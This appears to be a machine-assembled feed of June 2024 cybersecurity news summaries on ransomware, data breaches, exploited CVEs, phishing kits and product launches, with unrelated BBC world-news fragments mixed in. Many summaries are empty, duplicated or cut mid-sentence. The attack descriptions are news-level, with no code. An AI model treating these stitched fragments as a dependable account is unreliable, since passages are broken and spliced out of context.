As part of this initiative to improve security and resilience of rural hospital system, private sector partners have committed to the following: For independent Critical Access Hospitals and Rural Emergency Hospitals, Microsoft is extending its nonprofit program to provide grants and up to a 75% discount on security products optimized for smaller organizations. "Microsoft has unveiled a new cybersecurity program to support hospitals serving more than 60 million people living in rural America. In 2023, the healthcare sector reported more ransomware attacks than any other critical infrastructure sector and attacks involving ransomware against the healthcare sector were up nearly 130%. Cybersecurity attacks disrupt health care operations across the country and pose a direct threat to patient care and essential operations of hospitals. In rural communities these attacks can … More
The post Microsoft launches cybersecurity program to tackle attacks, protect rural hospitals appeared first on Help Net Security.
"Autosummary:
“Rural hospitals face a unique challenge in cybersecurity, balancing limited resources with the increasing sophistication of cyberthreats, which puts patient data and critical healthcare infrastructure at risk,” said Alan Morgan, CEO of NRHA. “Healthcare should be available no matter where you call home, and the rise in cyberattacks threatens the viability of rural hospitals and impact communities across the U.S.,” said Justin Spelhaug, corporate VP, Microsoft Philanthropies. "Unit21 launched its advanced Check Fraud Prevention and Investigation features. This new suite of tools addresses the rising threat of check fraud, which causes increased financial losses across the banking industry each year. In fact, according to a recent Thomson Reuters report, check fraud accounted for 20% of all SARs filing amounting to nearly 670,000 check fraud SARs filed by FIs in 2023. “Check fraud is a growing challenge for banks and credit unions, and … More
The post Unit21 automates the check investigation process for financial institutions appeared first on Help Net Security.
"Autosummary:
By integrating advanced AI techniques, image analysis, and dark web monitoring, the new features allow FIs to proactively find and stop fraud loss before it enters deposit channels while also automating the verification process of checks within the institution. "Autosummary:
"Analysis of an exploit tool deployed in recent attacks revealed evidence that it could have been compiled prior to patching, meaning at least one group may have been exploiting the vulnerability as a zero-day," the Symantec Threat Hunter Team, part of Broadcom, said in a report shared with The Hacker News. "Autosummary:
"This LNK file points to a batch script (BAT) hosted on the same server, which, upon user click, could potentially trigger additional malicious operations," Trustwave said, adding it could not retrieve the batch script due to the server being unresponsive. "Autosummary:
"Autosummary:
"Autosummary:
Demonstration of CVE-2024-26169 exploit used by Black Basta Source: BleepingComputer A fascinating aspect of Symantec"s findings is that one variant of the exploit tool has a compilation timestamp dated February 27, 2024, while a second sample was built even earlier, on December 18, 2023. "Acronis has introduced Acronis Advanced Security + XDR the newest addition to the company’s security solution portfolio. Easy to deploy, manage, and maintain, Acronis XDR expands on the current endpoint detection and response (EDR) offering and delivers complete natively integrated, highly efficient cybersecurity with data protection, endpoint management, and automated recovery specifically built for managed service providers (MSPs). Cyberattacks have become increasingly sophisticated due to cybercriminals deploying AI and attack surfaces expanding, allowing businesses to … More
The post Acronis XDR enhances EDR with comprehensive cybersecurity for MSPs appeared first on Help Net Security.
"Autosummary:
Easy to deploy, manage, and maintain, Acronis XDR expands on the current endpoint detection and response (EDR) offering and delivers complete natively integrated, highly efficient cybersecurity with data protection, endpoint management, and automated recovery specifically built for managed service providers (MSPs). "Autosummary:
"Autosummary:
When the PWA automatically launches, though, it will prompt the user to enter their credentials to log in, whether those are, for example, for a VPN product, Microsoft, AWS, or online store credentials. X prompting visitors to install its PWA Source: BleepingComputer Using PWAs to phish for credentials A new phishing toolkit created by security researcher mr.d0x demonstrates how to create PWA apps to display corporate login forms, even with a fake address bar showing the normal corporate login URL to make it look more convincing. "Autosummary:
The exposed data "does not include more sensitive information, such as credit card numbers, passwords or log-in credentials, location data, or government-issued identification numbers, because the Tile customer support platform did not contain these information types," Hulls added. "Autosummary:
"Autosummary:
The search prompt and the "failsafe" link Source: Trustwave In this case, the URL is for the Windows Search protocol to perform a search on a remote host using the following parameters: Query : Searches for items labeled "INVOICE. "Autosummary:
CVE-2024-4610 ARM Mali GPU Kernel Driver Use-After-Free Vulnerability CVE-2024-4577 PHP-CGI OS Command Injection Vulnerability The vulnerability CVE-2024-4610 is a use-after-free issue issue that impacts Bifrost GPU Kernel Driver (all versions from r34p0 to r40p0) and Valhall GPU Kernel Driver (all versions from r34p0 to r40p0). "Autosummary:
Ukraine Police arrested a hacker who developed a crypter used by Conti and LockBit ransomware operation Pierluigi Paganini June 12, 2024 June 12, 2024 The Ukraine cyber police arrested a Russian man for having developed the crypter component employed in Conti and LockBit ransomware operations. "Autosummary:
To apply the security update, Pixel users must go to Settings > Security & privacy > System & updates > Security update, tap Install, and restart the device to complete the update process. "This article includes excerpts from various reports that provide statistics and insights on cybersecurity jobs, skills shortages, and workforce dynamics. Lack of skills and budget slow zero-trust implementation Entrust | 2024 State of Zero Trust & Encryption Study | May 2024 Despite 60% of organizations reporting significant senior leadership support for zero trust, a lack of skills and budget are still cited as the biggest roadblocks to implementing these frameworks, highlighting a discrepancy between support … More
The post Preparing for a career in cybersecurity? Check out these statistics appeared first on Help Net Security.
"Autosummary:
IDC | Enterprise Resilience: IT Skilling Strategies, 2024 | May 2024 IDC predicts that by 2026, more than 90% of organizations worldwide will feel the pain of the IT skills crisis, amounting to some $5.5 trillion in losses caused by product delays, impaired competitiveness, and loss of business. "Autosummary:
"Autosummary:
Next, the malware launches "WINWORD2013.EXE," a legitimate executable associated with Microsoft Word, using it to sideload "wwlib.dll" that, in turn, establishes persistence on the system and loads "xig.ppt" into memory. "Autosummary:
“When I started to analyze this vulnerability, first I was kind of disappointed on how little information veeam provided, just saying the authentication can be bypassed and not much more, however, just knowing it’s something to do with Authentication and the mitigation suggesting the issue has something to do with the either “VeeamEnterpriseManagerSvc” or “VeeamRESTSvc” services, I began my patch diffing routine and realized the entry point, I’ll introduce VeeamRESTSvc also known as Veeam.Backup.Enterprise.RestAPIService.exe ” reads the post published by the researcher. "Autosummary:
Malicious HTA file Source: Imperva This file contains VBScript with a base64-encoded string that decodes into a binary, loading a .NET variant of the ransomware into the host"s memory, Imperva researchers explain. "Autosummary:
More than 11,000 customers use Pure Storage"s data storage platform, including high-profile companies and organizations like Meta, Ford, JP Morgan, NASA, NTT, AutoNation, Equinix, and Comcast. "Autosummary:
The privacy watchdogs are going to investigate: the scope of information that was exposed by the breach and potential harms to affected individuals; whether 23andMe had adequate safeguards to protect the highly sensitive information within its control; and whether the company provided adequate notification about the breach to the two regulators and affected individuals as required under Canadian and UK privacy and data protection laws. "Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
Reuters Garry Conille will act as prime minister and interior minister Mr Conille"s attorney, Carlos Hercules, will be the minister for justice and public security and Haiti’s ambassador to Unesco, Dominique Dupuy, will be the foreign affairs minister. "75% of security professionals had to change their cybersecurity strategy in the last year due to the rise in AI-powered cyber threats, with 73% expressing a greater focus on prevention capabilities, according to Deep Instinct. Additionally, 97% of respondents are concerned their organization will suffer a security incident due to adversarial AI. “The biggest challenge for SecOps teams is keeping pace with the rapidly evolving threat landscape being driven by AI. These never-before-seen threats are … More
The post Cybersecurity pros change strategies to combat AI-powered threats appeared first on Help Net Security.
"Autosummary:
The report, conducted by Sapio Research, surveyed 500 senior cybersecurity experts from companies with 1,000+ employees in the US operating in financial services, technology, manufacturing, retail, healthcare, public sector, or critical infrastructure. "Autosummary:
“Based on our investigation, we have determined that the third party was likely a cybercrime group, which gained access to, among other information, personally identifiable information.” reads the Form 10-Q (quarterly report of financial performance) filed by the company with the SEC in May. "With its capability to analyze, predict, and automate, AI stands to reshape many corners of business, most notably cybersecurity. In the field of vulnerability management specifically, AI is poised to have a profound impact, enhancing two key areas: Providing quicker analysis and uncovering hidden threats Offering more effective risk reduction solutions AI’s impact on vulnerability management is more than mere automation: it brings analytical speed, unlike anything we’ve previously experienced. The capacity for rapid analysis … More
The post AI’s role in accelerating vulnerability management appeared first on Help Net Security.
"Autosummary:
Providing quicker analysis and uncovering hidden threats Offering more effective risk reduction solutions AI’s impact on vulnerability management is more than mere automation: it brings analytical speed, unlike anything we’ve previously experienced. AI to streamline vulnerability management Artificial Intelligence has the potential to drastically transform risk reduction in vulnerability management by utilizing historical and organization-specific data to offer tailored suggestions and prioritize vulnerabilities according to an organization’s risk profile.With its capability to analyze, predict, and automate, AI stands to reshape many corners of business, most notably cybersecurity. "Autosummary:
Sticky Werewolf targets the aviation industry in Russia and Belarus Pierluigi Paganini June 10, 2024 June 10, 2024 Morphisec researchers observed a threat actor, tracked as Sticky Werewolf, targeting entities in Russia and Belarus. "Autosummary:
According to the CSA, these operations have targeted various industries, including aerospace and defense, education, energy and utilities, governments, hospitality, manufacturing, oil and gas, retail, technology, and transportation.Targeted countries include the Czech Republic, Italy, Lithuania, Jordan, Montenegro, Poland, Slovakia, Turkey, Ukraine, the United Arab Emirates, and the US.According to them, victims are globally distributed, vary greatly in size and span multiple industries, including: global government and military departments, national telecommunications companies, defense contractors, aerospace, aviation, engineering, and others. Pawn Storm/Sofacy/APT28 attacks TrendMicro reported that Pawn Storm (aka APT28, Sofacy, Fancy Bear, Sednit, and Forest Blizzard) launched NTLMv2 hash relay attacks between April 2022 and November 2023 to brute-force its way into government, defense, military, energy and transportation networks worldwide. StrelaStealer attacks Palo Alto Networks researchers identified a wave of large-scale StrelaStealer campaigns that impacted more than 100 organizations in the EU and US, including manufacturing, utilities and energy, construction, high tech, and other industries.Some of the devices and software compromised by the attackers include Fortinet FortiGuard, PRTG Network Monitor appliances, ManageEngine ADSelfService Plus, FatePipe WARP, Ivanti Connect Secure VPN, and Cisco ASA, according to the Dragos report.So far, RedCurl has carried out more than 40 attacks: half of them in Russia, the rest in the UK, Germany, Canada, Norway, and Ukraine. Volt Typhoon CISA alert The Cybersecurity and Infrastructure Security Agency (CISA), National Security Agency (NSA), and Federal Bureau of Investigation (FBI) published a joint guidance and advisory on February 7 focusing on the Chinese-speaking threat actor, Volt Typhoon, which infiltrated a critical infrastructure network in the United States and remained undetected for at least five years before being discovered. Attackers send phishing emails in the name of domestic government agencies (Roskomnadzor, Investigative Committee, Military Prosecutor’s Office, court orders, and other regulatory requirements) and trick recipients into launching a malicious file, after which they deliver the White Snake stealer to the victim’s computer. "Autosummary:
The number of fires from the start of the year up to 9 June has been 935% higher than in the same period last year, according to figures from Brazil"s National Institute for Space Research (INPE). "Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
" 23andMe accounts breached in credential-stuffing attack In January, Genetic testing provider 23andMe confirmed that the attackers stole health reports and raw genotype data of affected customers in a five-month credential-stuffing attack from April 29 to September 27. "Compliance Scorecard has unveiled the latest version of its Compliance-as-a Service (CaaS) platform. The updated platform now includes advanced risk management tools, improved asset management capabilities, and new compliance reporting methods designed to help MSPs strengthen their cybersecurity service offerings and unlock new revenue opportunities. “The new features collectively enhance the ability of MSPs to manage risks proactively and maintain a strong security posture, ultimately enhancing their clients’ governance, risk, and compliance (GRC) strategies,” said … More
The post Compliance Scorecard enhances its CaaS platform to improve MSPs’ cybersecurity posture appeared first on Help Net Security.
"Autosummary:
“The new features collectively enhance the ability of MSPs to manage risks proactively and maintain a strong security posture, ultimately enhancing their clients’ governance, risk, and compliance (GRC) strategies,” said Tim Golden, CEO of Compliance Scorecard. "LendingTree subsidiary QuoteWizard and automotive parts provider Advance Auto Parts have been revealed as victims of attackers who are trying to sell data stolen from Snowflake-hosted cloud databases. Snowflake says that their investigation is still ongoing, but continues to stand by the preliminary results: the attackers accessed customer accounts secured with single-factor authentication by leveraging credentials “previously purchased or obtained through infostealing malware.” Snowflake customers suffering data breaches US-based Snowflake is a cloud data storage … More
The post The number of known Snowflake customer data breaches is rising appeared first on Help Net Security.
"Autosummary:
The names of some of the victims have been revealed when attackers posted offers to sell the stolen data: Santander Group (compromise confirmed by the company, without mentioning Snowflake) Live Nation Entertainment subsidiary TicketMaster (confirmed by the company via SEC 8-K report, Snowflake identified as the third party in question by a Ticketmaster spokesperson) LendingTree confirmed that they’ve been notified by Snowflake that QuoteWizard “may have had data impacted by this incident” Advance Auto Parts (data theft not officially confirmed by the company, but the dark web listing claims that a massive amount of customer and employee info has been stolen) "Autosummary:
It"s designed to support over 54 banks located in Austria, Belgium, Finland, France, Germany, Greece, Ireland, Italy, Luxembourg, and the Netherlands. "Autosummary:
These courses delve deep into security topics like incident response, exposure management or cloud security, ensuring you gain valuable knowledge while racking up credits Industry Events - Conferences, workshops, and webinars hosted by security companies, industry associations, prominent cybersecurity vendors or even your own employer can be treasure troves for CPEs. CPEs are best understood in terms of other professions: just like medical, legal and even CPA certifications require continuing education to stay up-to-date on advancements and industry changes, cybersecurity professionals need CPEs to stay informed about the latest hacking tactics and defense strategies.Self- paced over 4-5 hours, it delves into the fundamentals of Exposure Management, and Gartner"s Continuous Threat Exposure Management (CTEM) framework, which is their recommended way to put Exposure Management into an actionable and repeatable plan. CPE credits are crucial for maintaining certifications issued by various cybersecurity credentialing organizations, such as (ISC)², ISACA, and CompTIA. "Autosummary:
"Autosummary:
The investigation revealed an unauthorized actor accessed some of our systems and certain files stored therein between May 8, 2024, and May 9, 2024, and some files were copied from those systems on May 9, 2024.” reads the letter. "Autosummary:
UNC5537 Snowflake attack timeline (Mandiant) While Mandiant has not shared much information about UNC5537, BleepingComputer has learned they are part of a larger community of threat actors who frequent the same websites, Telegram, and Discord servers, where they commonly collaborate on attacks. "The impacted accounts were not configured with multi-factor authentication enabled, meaning successful authentication only required a valid username and password," Mandiant said. "Autosummary:
Bifrost-based Mali GPUs are used in smartphones/tables (G31, G51, G52, G71, and G76), single-board computers, Chromebooks, and various embedded systems. "Autosummary:
UK NHS call for O-type blood donations following ransomware attack on London hospitals Pierluigi Paganini June 10, 2024 June 10, 2024 The UK NHS issued an urgent call for O-type blood donations following the recent ransomware attack that hit several London hospitals. “England’s top doctor has today (Monday 10 June) backed calls from NHS Blood and Transplant (NHSBT) for O Positive and O Negative blood donors to urgently book appointments to donate in one of the 25 town and city centre NHS Blood Donor Centres in England, to boost stocks of O type blood following the cyber incident in London. ” "Autosummary:
"Autosummary:
Nigeria Police Samuel, 22, and Samson Ogoshi, 20, arrested in Lagos, are awaiting sentencing in the US It was less than six hours from the time Jordan started communicating until the time he ultimately took his life.The NCCC director pointed to the fact that the government has spent millions of pounds on a state-of-the-art cyber-crime centre, to show it was taking cyber-crime seriously, especially sextortion.Dead in 6 hours: How Nigerian sextortion scammers targeted my son 3 hours ago By Joe Tidy , @joetidy, Cyber correspondent, BBC World Service Share BBC Sextortion is the fastest-growing scam affecting teenagers globally and has been linked to more than 27 suicides in the US alone. "Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: High-risk Atlassian Confluence RCE fixed, PoC available (CVE-2024-21683) If you’re self-hosting an Atlassian Confluence Server or Data Center installation, you should upgrade to the latest available version to fix a high-severity RCE flaw (CVE-2024-21683) for which a PoC and technical details are already public. Kali Linux 2024.2 released: 18 new tools, countless updates Kali Linux 2024.2 is now available. It … More
The post Week in review: Atlassian Confluence RCE PoC, new Kali Linux, Patch Tuesday forecast appeared first on Help Net Security.
"Autosummary:
Infosec products of the month: May 2024 Here’s a look at the most interesting products from the past month, featuring releases from: Abnormal Security, Adaptive Shield, Appdome, AuditBoard, Calix, Cranium, CyberArk, Cybersixgill, Dashlane, Datadog, Detectify, Eclypsium, ExtraHop, FireMon, Forcepoint, ManageEngine, OneTrust, OWASP Foundation, PlexTrac, Proofpoint, Secure Code Warrior, SentinelOne, Snyk, Splunk, Strike Graph, Sumo Logic, Synopsys, Trellix, and Truecaller. New infosec products of the week: June 7, 2024 Here’s a look at the most interesting products from the past week, featuring releases from Appdome, SailPoint, Tines, Trend Micro, Verimatrix, and Zyxel Networks. "Autosummary:
"Autosummary:
"Autosummary:
" According to the Veeam Ransomware Trends Report 2024, which is based on a survey of 1,200 security professionals, organizations experiencing a ransomware attack can recover, on average, only 57% of the compromised data, leaving them vulnerable to "substantial data loss and negative business impact. "Autosummary:
"At the same time, to upload stolen documents, files, passwords and other information from the computer, the standard synchronization functionality of the legitimate SyncThing software was used, which, among other things, supports the establishment of a peer-to-peer connection between computers," CERT-UA said. "Autosummary:
"Autosummary:
Chinese threat actor exploits old ThinkPHP flaws since October 2023 Pierluigi Paganini June 07, 2024 June 07, 2024 Akamai observed a Chinese-speaking group exploiting two flaws, tracked as CVE-2018-20062 and CVE-2019-9082, in ThinkPHP applications. “The web shell demonstrates advanced capabilities, such as navigating the file system, which enables operations like file editing, deletion, and timestamp modification for obfuscation purposes.” continues the analysis. "Autosummary:
Claimed by RansomHub While Christie"s didn"t name the attackers behind the May breach, the RansomHub gang added the auction house to its dark web leak portal, claiming it had breached its systems and stolen sensitive client data. "Autosummary:
A screenshot (redacted below) contains customer information, such as full name, date of birth, physical address, social security number, email address, subscription status, and service notes. "SolarWinds has fixed a high-severity vulnerability (CVE-2024-28995) affecting its Serv-U managed file transfer (MFT) server solution, which could be exploited by unauthenticated attackers to access sensitive files on the host machine. About CVE-2024-28995 Serv-U MFT Server is a widely used enterprise solution that provides secure file transfer and file sharing hosted on Windows and Linux machines. Discovered and reported by Hussein Daher, CVE-2024-28995 is a directory transversal (aka path traversal) vulnerability that affects SolarWinds Serv-U … More
The post SolarWinds fixes severe Serv-U vulnerability (CVE-2024-28995) appeared first on Help Net Security.
"Autosummary:
"Autosummary:
A screenshot (redacted below) contains customer information, such as full name, date of birth, physical address, social security number, email address, subscription status, and service notes. "94% of SMBs have experienced at least one cyberattack, a dramatic rise from 64% in 2019, according to ConnectWise. This increase in cyberattacks is exacerbated by the fact that 76% of SMBs lack the in-house skills to properly address security issues, increasing demand for the expertise and services of MSPs. Rising cyberattack frequency on SMBs The growing wave of cyber incidents is eroding SMBs’ confidence in their ability to protect their businesses with a staggering … More
The post 78% of SMBs fear cyberattacks could shut down their business appeared first on Help Net Security.
"Autosummary:
Conducted between March and April 2024, this research includes insights from 700 IT decision makers and business decision makers, with representation in the US, Canada, UK, and Australia and New Zealand. "Sophos released its report, “Operation Crimson Palace: Threat Hunting Unveils Multiple Clusters of Chinese State-Sponsored Activity Targeting Southeast Asia,” which details a highly sophisticated, nearly two-year long espionage campaign against a high-level government target. During Sophos X-Ops’ investigation, which began in 2023, the managed detection and response (MDR) team found three distinct clusters of activity targeting the same organization, two of which included tactics, techniques and procedures (TTPs) that overlap with well-known, Chinese nation-state groups: … More
The post Chinese attackers leverage previously unseen malware for espionage appeared first on Help Net Security.
"Autosummary:
During Sophos X-Ops’ investigation, which began in 2023, the managed detection and response (MDR) team found three distinct clusters of activity targeting the same organization, two of which included tactics, techniques and procedures (TTPs) that overlap with well-known, Chinese nation-state groups: BackdoorDiplomacy, APT15 and the APT41 subgroup Earth Longzhi. “As Western governments elevate awareness about cyberthreats from China, the overlap Sophos has uncovered is an important reminder that focusing too much on any single Chinese attribution may put organizations at risk of missing trends about how these groups coordinate their operations,” said Paul Jaramillo, director, threat hunting and threat intelligence, Sophos. "Autosummary:
Among the malware families distributed in this manner are Agent Tesla, AsyncRAT, LockBit, LodaRAT, NanoCore, Neshta, NjRAT, Quasar RAT, Ramnit, RedLine, Remcos, RevengeRAT, XWorm, and ZXShell. "Autosummary:
Since January 2020, affiliates utilizing LockBit have targeted organizations of diverse sizes spanning critical infrastructure sectors such as financial services, food and agriculture, education, energy, government and emergency services, healthcare, manufacturing, and transportation. “Additionally, from our ongoing disruption of LockBit, we now have over 7,000 decryption keys and can help victims reclaim their data and get back online.” said Bryan Vorndran, the Assistant Director at the FBI Cyber Division, during the 2024 Boston Conference on Cyber Security. "Autosummary:
"Muhstik is a well-known threat targeting IoT devices and Linux-based servers, notorious for its ability to infect devices and utilize them for cryptocurrency mining and launching Distributed Denial of Service (DDoS) attacks," Cloud security firm Aqua said in a report published this week. "Autosummary:
Colombian government sets peace talks date with rebels 55 minutes ago Vanessa Buschschlüter , BBC News Share Twitter/@BrunoRguezP Cuba, which is one of the guarantor nations in the peace talks, tweeted a group photo Colombia"s government and a group of left-wing rebels have said they will begin formal peace talks later this month. "Autosummary:
"Autosummary:
" Once they gain access to the internal network, the attackers perform "pass-the-hash" attacks on administrator accounts, which are used to establish RDP connections to Windows servers running Hyper-V. Alternatively, credential stuffing is used to hijack valuable accounts, followed by PsExec deployment on multiple hosts. "Autosummary:
Vorndran described how LockBit was set up and administered by a 31-year-old Russian called Dmitry Khoroshev (who used online handles such as "LockBitsupp," "Putinkrab," and "Nerowolfe"), who receives a 20% cut of whatever payments are extorted from the ransomware"s innocent victims. "Autosummary:
A new Linux version of TargetCompany ransomware targets VMware ESXi environments Pierluigi Paganini June 06, 2024 June 06, 2024 A new Linux variant of the TargetCompany ransomware family targets VMware ESXi environments using a custom shell script. "Autosummary:
Specifically, the attackers exploit the bugs to download a text file named "public.txt," which, in reality, is the obfuscated Dama web shell saved as "roeter.php." "Autosummary:
If they have reactions from real people , recommendations from previous employers and colleagues, certifications, genuine reactions of their own on the posts of others, etc. , recommendations from previous employers and colleagues, certifications, genuine reactions of their own on the posts of others, etc. So, to confirm whether you are about to interact with a genuine offer, your best bet is to check: Whether the company and person exist – legal business name, address, registration, online presence, and potential news reports. On the other hand, with OSINT tools, people can check how exposed they are online, so they also have a positive application, especially for security practitioners, who can use them to uncover information about potential threats that can upset the security postures of those they protect. "Corporate Data Protection Manager GLS | Germany | Hybrid – View job details As a Corporate Data Protection Manager, you will develop the Corporate Data Protection Framework with a special focus on compliance with the EU General Data Protection Regulation. Develop projects and processes to strengthen data protection in the international GLS organization and guide the country data protection functions in their implementation. Design and implement data protection guidance, trainings and other awareness measures. Cyber … More
The post Cybersecurity jobs available right now: June 5, 2024 appeared first on Help Net Security.
"Autosummary:
Senior Cybersecurity Assurance Analyst-RedTeam Ops Emirates | UAE | On-site – View job details As a Senior Cybersecurity Assurance Analyst-RedTeam Ops, you will develop, implement, lead, and continuously improve the security verification and testing processes consisting of but not limited to risk assessments, compliance reviews, vulnerability assessments and penetration tests based on industry best practices and as defined by the assurance. Logging & Asset Management Specialist – USDS TikTok | Australia | On-site – View job details As a Logging and Analytics Platform Operations Specialist, you will be responsible for supporting the Logging and Analytics Platform Operations Lead and cross functional partners in deploying, integrating, and managing, technologies to support the security and protection of data in accordance with relevant geographical regulations, contractual commitments, and confidentiality requirements. SOC Engineer ZeroTrust | Indonesia | Hybrid – View job details The SOC Engineer will be responsible for performing day-to-day tasks such as monitoring, analyzing, and responding to security incidents, managing security tools and technologies, conducting security assessments, and implementing security measures. "Autosummary:
"This threat actor has an extensive understanding of the VBScript language, and Windows internals and utilities, such as WMI, diskpart, and bcdboot," Kaspersky said in its analysis of ShrinkLocker, noting that they likely "already had full control of the target system when the script was executed." "Autosummary:
Knight ransomware sale post on RAMP forums source: KELA RansomHub"s Knight origin Malware analysts at Symantec, part of Broadcom, found multiple similarities between the two ransomware families that point to a common origin: Both ransomware families are written in Go and use Gobfuscate for obfuscation. "Autosummary:
Remind them to be selective about what they share online and who they connect with, and if a stranger reaches out to them demanding payment or sexually explicit images, they should speak to a trusted adult before sending anything, be it money, photos, or more messages.Scammers then threaten victims into sending payment, usually in the form of cryptocurrency, wire transfer, or gift cards, otherwise they’ll post the images online for all to see. Financial sextortion happens when adult criminals create fake accounts posing as young women on social media, gaming platforms, or messaging apps, and coerce victims into sending explicit photos. "Autosummary:
Announcing the latest version of Malwarebytes, which brings a faster, responsive, and consistent user interface, integrated security and privacy, and expert guidance to keep you secure.In our recent report, “Everyone’s afraid of the internet, and no one’s sure what to do about it,” we found that only half of the people surveyed felt confident they knew how to stay safe online, and even fewer said they were taking the right measures to protect themselves. "Autosummary:
Crimson Palace comprises three intrusion clusters, some of which share the same tactics, although there is evidence of older activity dating back to March 2022 - Cluster Alpha (March 2023 - August 2023), which exhibits some degree of similarity with actors tracked as BackdoorDiplomacy, REF5961, Worok, and TA428 (March 2023 - August 2023), which exhibits some degree of similarity with actors tracked as BackdoorDiplomacy, REF5961, Worok, and TA428 Cluster Bravo (March 2023), which has commonalities with Unfading Sea Haze, and (March 2023), which has commonalities with Unfading Sea Haze, and Cluster Charlie (March 2023 - April 2024), which has overlaps with Earth Longzhi, a subgroup within APT41 Sophos assessed that these overlapping activity clusters were likely part of a coordinated campaign orchestrated under the direction of a single organization. "Autosummary:
"Autosummary:
Ciaran Martin, the inaugural CEO of the UK"s National Cyber Security Centre (NCSC), said today that the Qilin gang is likely responsible for the incident The attack has resulted in Synnovis being locked out of its systems and is causing ongoing service disruptions at Guy"s and St Thomas" NHS Foundation Trust, King"s College Hospital NHS Foundation Trust, and various primary care providers across south east London. "Autosummary:
Kali 2024.2 doesn"t disappoint, with eighteen new tools added in this release: autorecon - Multi-threaded network reconnaissance tool coercer - Automatically coerce a Windows server to authenticate on an arbitrary machine dploot - Python rewrite of SharpDPAPI getsploit - Command line utility for searching and downloading exploits gowitness - Web screenshot utility using Chrome Headless horst - Highly Optimized Radio Scanning Tool ligolo-ng - Advanced, yet simple, tunneling/pivoting tool that uses a TUN interface mitm6 - pwning IPv4 via IPv6 netexec - Network service exploitation tool that helps automate assessing the security of large networks. "The vulnerability that allowed a German journalist to discover links to video conference meetings held by Bundeswehr (the German armed forces) and the Social Democratic Party of Germany (SPD) via their self-hosted Cisco Webex instances similarly affected the Webex cloud service. The Cisco Webex Meetings cloud vulnerability The vulnerability affected all organizations “that have a domain such as organisationsname.webex.com,” according to Netzbegrünung, an association that organizes the digital infrastructure for Bündnis 90/Die Grünen (a German … More
The post Vulnerability in Cisco Webex cloud service exposed government authorities, companies appeared first on Help Net Security.
"Autosummary:
Discovered by Netzbegrünung and verified by Eva Wolfangel with ZEIT Online, the bug allowed the discovery of information about past and future Webex meetings involving: The country’s Federal Office for Information Security (BSI), the Bundestag (i.e., the parliament), various ministries, the Federal Chancellery, and other federal and state offices Authorities and companies – big and small – in Germany, the Netherlands, Italy, Austria, France, Switzerland, Ireland and Denmark Unlike the Bundeswehr and the SPD, these organizations use Webex in the cloud, Wolfangel said. "Kali Linux 2024.2 is now available. It includes future package compatibility for 32-bit platforms, improvements to GNOME 46 and Xfce, and 18 new tools. Desktop changes Kali 2024.2 introduces GNOME 46, offering a refined experience that builds on the enhancements from previous versions. The Xfce desktop has undergone specific changes for Kali-Undercover and HiDPI modes. These updates improve stability and include several minor bug fixes, ensuring better support for the latest desktop features. New tools … More
The post Kali Linux 2024.2 released: 18 new tools, countless updates appeared first on Help Net Security.
"Autosummary:
"Autosummary:
Also known as Mallox, FARGO, and Tohnichi, the TargetCompany ransomware operation emerged in June 2021 and has been focusing on database attacks (MySQL, Oracle, SQL Server) against organizations mostly in Taiwan, South Korea, Thailand, and India. "Autosummary:
"Autosummary:
The full OCR text with the temporarily visible password is available in the %LocalAppData%CoreAIPlatform.00UKP{<UUID>}ukg.db SQLite database, nicely gift wrapped 🎁 for infostealer malware to exfiltrate: pic.twitter.com/UKRjSPdUNs — Marc-André Moreau (@awakecoding) June 3, 2024 While Recall remains as a “preview” feature and, according to Microsoft’s small print, could change before it launches, Beaumont writes in his research that the company “should recall Recall and rework it to be the feature it deserves to be, delivered at a later date.” "Autosummary:
According to the indictment, Mr Guan led the outlet"s "Make Money Online" team, which used cryptocurrency to purchase tens of millions worth of crime proceeds. "Free, open-source cybersecurity tools have become indispensable to protecting individuals, organizations, and critical infrastructure from cyber threats. These tools are created through collaborative and transparent efforts, making them affordable and accessible alternatives to proprietary software. Here, you will find a curated list of free cybersecurity tools you should consider. Authelia: Open-source authentication and authorization server Authelia is an open-source authentication and authorization server that offers 2FA and SSO for applications through a web portal. It … More
The post 20 free cybersecurity tools you might have missed appeared first on Help Net Security.
"Autosummary:
Protobom: Open-source software supply chain tool Protobom is an open-source software supply chain tool that enables all organizations, including system administrators and software development communities, to read and generate Software Bill of Materials (SBOMs), file data, and translate this data across standard industry SBOM formats. Mantis: Open-source framework that automates asset discovery, reconnaissance, scanning Mantis is an open-source command-line framework that automates asset discovery, reconnaissance, and scanning. "In this Help Net Security video, Paul Prudhomme, Principal Security Analyst at SecurityScorecard, discusses the findings of the 2024 Redefining Resilience: Concentrated Cyber Risk in a Global Economy Research report. This research details a surge in adversaries exploiting third-party vulnerabilities and uncovers an extreme concentration of cyber risk in just 15 vendors, posing a serious threat to national security and global economies. Key findings include: 150 companies account for 90% of the technology products and … More
The post Third-party vendors pose serious cybersecurity threat to national security appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Plainsea is a cutting-edge platform set to shake up the cybersecurity scene with its European launch at Infosecurity Europe in 2024. As cyber threats continue to evolve at an alarming rate, the demand for efficient and intelligent cybersecurity solutions has never been higher. At the same time, the shortage of skilled cybersecurity experts is severe and continues to grow. That’s where Plainsea comes in. Designed with managed security service providers in mind, Plainsea offers a … More
The post Plainsea cybersecurity platform to launch at Infosecurity Europe appeared first on Help Net Security.
"Autosummary:
"ManageEngine launched passwordless, phishing-resistant FIDO2 authentication for enterprise applications in ADSelfService Plus, its on-premises identity security solution, and the launch of endpoint MFA for Windows machines and elevated system actions in Identity360, its cloud-native identity management platform. Identity-first security: A significant stride towards zero trust Attackers are ever striving to breach authentication mechanisms by stealing and misusing identities, predominantly via phishing attacks. Egress’ 2024 Email Security Risk Report states that 79% of account takeover (ATO) … More
The post ManageEngine unveils passwordless, phishing-resistant FIDO2 authentication appeared first on Help Net Security.
"Autosummary:
ManageEngine launched passwordless, phishing-resistant FIDO2 authentication for enterprise applications in ADSelfService Plus, its on-premises identity security solution, and the launch of endpoint MFA for Windows machines and elevated system actions in Identity360, its cloud-native identity management platform. "Autosummary:
The attack chain, per Fortinet FortiGuard Labs, involves a Microsoft Excel file that carries an embedded VBA macro to initiate the infection, "The attacker uses a multi-stage malware strategy to deliver the notorious "Cobalt Strike" payload and establish communication with a command-and-control (C2) server," security researcher Cara Lin said in a Monday report. "Autosummary:
